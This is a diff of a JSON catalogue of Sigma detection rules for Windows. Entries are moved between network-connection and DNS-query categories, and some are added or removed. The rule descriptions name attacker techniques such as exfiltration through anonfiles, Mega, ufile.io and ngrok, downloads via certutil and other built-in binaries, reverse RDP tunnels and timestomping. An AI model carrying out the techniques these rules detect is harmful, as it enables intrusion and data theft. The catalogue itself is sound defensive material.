service" ], - "filename": "net_connection_win_certutil.yml", + "filename": "file_change_win_2022_timestomping.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "file_change", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ] + }, + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year" + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus" + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + "filename": "dns_query_win_anonymfiles_com.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain" + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lobas_appinstaller.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" ], "tags": [ "attack.command_and_control", "attack.t1105" ] }, - "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", - "value": "Certutil Initiated Connection" + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS" }, { - "description": "Detects process connections to a Monero crypto mining pool", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", + "author": "frack113, Connor Martin", + "creation_date": "2022/07/11", "falsepositive": [ - "Legitimate use of crypto miners" + "Legitimate usage of the softwares mentioned above" ], - "filename": "net_connection_win_crypto_mining.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ] - }, - "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "value": "Windows Crypto Mining Pool Connections" - }, - { - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "meta": { - "author": "Sorina Ionescu", - "creation_date": "2022/08/17", - "falsepositive": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." - ], - "filename": "net_connection_win_dead_drop_resolvers.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" - ] - }, - "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "value": "Dead Drop Resolvers" - }, - { - "description": "Detects Dllhost that communicates with public IP addresses", - "meta": { - "author": "bartblaze", - "creation_date": "2020/07/13", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "filename": "net_connection_win_dllhost_net_connections.yml", + "filename": "dns_query_win_remote_access_software_domains.yml", "level": "medium", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" - ] - }, - "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", - "value": "Dllhost Internet Connection" - }, - { - "description": "Detects network connections from Equation Editor", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_eqnedt.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", - "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ] - }, - "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "value": "Equation Editor Network Connection" - }, - { - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", - "creation_date": "2021/11/10", - "falsepositive": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." - ], - "filename": "net_connection_win_excel_outbound_network_connection.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://corelight.com/blog/detecting-cve-2021-42292", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ] - }, - "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "value": "Excel Network Connections" - }, - { - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_hh.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", - "value": "HH.EXE Network Connections" - }, - { - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Legitimate script" - ], - "filename": "net_connection_win_imewdbld.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", - "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ] }, - "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", - "value": "Download a File with IMEWDBLD.exe" - }, - { - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/19", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_malware_backconnect_ports.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ] - }, - "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", - "value": "Suspicious Typical Malware Back Connect Ports" - }, - { - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/06", - "falsepositive": [ - "Legitimate use of mega.nz uploaders and tools" - ], - "filename": "net_connection_win_mega_nz.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://megatools.megous.com/", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "value": "Communication To Mega.nz" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate msiexec over networks" - ], - "filename": "net_connection_win_msiexec.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "value": "Msiexec Initiated Connection" - }, - { - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/16", - "falsepositive": [ - "Legitimate use of ngrok.io" - ], - "filename": "net_connection_win_ngrok_io.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://ngrok.com/", - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "18249279-932f-45e2-b37a-8925f2597670", - "value": "Communication To Ngrok.Io" - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/03", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "filename": "net_connection_win_ngrok_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ] - }, - "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", - "value": "Communication To Ngrok Tunneling Service" - }, - { - "description": "Detects suspicious network connection by Notepad", - "meta": { - "author": "EagleEye Team", - "creation_date": "2020/05/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_notepad_network_connection.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", - "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "value": "Notepad Making Network Connection" - }, - { - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/13", - "falsepositive": [ - "Administrative scripts", - "Microsoft IP range" - ], - "filename": "net_connection_win_powershell_network_connection.yml", - "level": "low", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.youtube.com/watch?v=DLtJTxMWZ2o", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "value": "PowerShell Network Connections" - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Legitimate python script" - ], - "filename": "net_connection_win_python.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", - "https://pypi.org/project/scapy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", - "value": "Python Initiated Connection" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/16", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "value": "RDP Over Reverse SSH Tunnel" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/29", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_rdp_to_http.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", - "value": "RDP to HTTP or HTTPS Target Ports" + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "DNS Query To Remote Access Software Domain" }, { "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", @@ -27057,14 +27769,14 @@ "falsepositive": [ "Unknown" ], - "filename": "net_connection_win_regsvr32_network_activity.yml", + "filename": "dns_query_win_regsvr32_network_activity.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" ], "tags": [ "attack.execution", @@ -27073,7337 +27785,497 @@ "attack.t1218.010" ] }, - "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "value": "Regsvr32 Network Activity" + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS" }, { - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "description": "Detects DNS queries for subdomains used for upload to ufile.io", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", + "author": "yatinwad and TheDFIRReport", + "creation_date": "2022/06/23", "falsepositive": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Legitimate Ufile upload" ], - "filename": "net_connection_win_remote_powershell_session_network.yml", + "filename": "dns_query_win_ufile_io.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "value": "Remote PowerShell Session (Network)" - }, - { - "description": "Detects a rundll32 that communicates with public IP addresses", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/04", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "filename": "net_connection_win_rundll32_net_connections.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" - ] - }, - "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "value": "Rundll32 Internet Connection" - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate scripts" - ], - "filename": "net_connection_win_script.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "value": "Script Initiated Connection" - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate scripts" - ], - "filename": "net_connection_win_script_wan.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "value": "Script Initiated Connection to Non-Local Network" - }, - { - "description": "Detects a possible remote connections to Silenttrinity c2", - "meta": { - "author": "Kiran kumar s, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1127.001" - ] - }, - "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", - "value": "Silenttrinity Stager Msbuild Activity" - }, - { - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "20384606-a124-4fec-acbb-8bd373728613", - "value": "Suspicious Network Connection Binary No CommandLine" - }, - { - "description": "Detects suspicious network connection by Cmstp", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_cmstp.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ] - }, - "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "value": "Cmstp Making Network Connection" - }, - { - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/20", - "falsepositive": [ - "Legitimate use of the API with a tool that the author wasn't aware of" - ], - "filename": "net_connection_win_susp_dropbox_api.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" - ], - "tags": "No established tags" - }, - "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", - "value": "Suspicious Dropbox API Usage" - }, - { - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "meta": { - "author": "frack113, Tim Shelton (fps)", - "creation_date": "2022/07/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_epmap.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/RiccardoAncarani/TaskShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", - "value": "Suspicious Epmap Connection" - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Other browsers" - ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "value": "Suspicious Outbound Kerberos Connection" - }, - { - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "meta": { - "author": "elhoim", - "creation_date": "2022/04/28", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" - ], - "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", - "value": "Microsoft Sync Center Suspicious Network Connections" - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Other SMTP tools" - ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" ], "tags": [ "attack.exfiltration", - "attack.t1048.003" + "attack.t1567.002" ] }, - "uuid": "9976fa64-2804-423c-8a5b-646ade840773", - "value": "Suspicious Outbound SMTP Connections" + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain" }, { - "description": "Detects programs with network connections running in suspicious files system locations", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2017/03/19", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Mega upload" + ], + "filename": "dns_query_win_mega_nz.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + 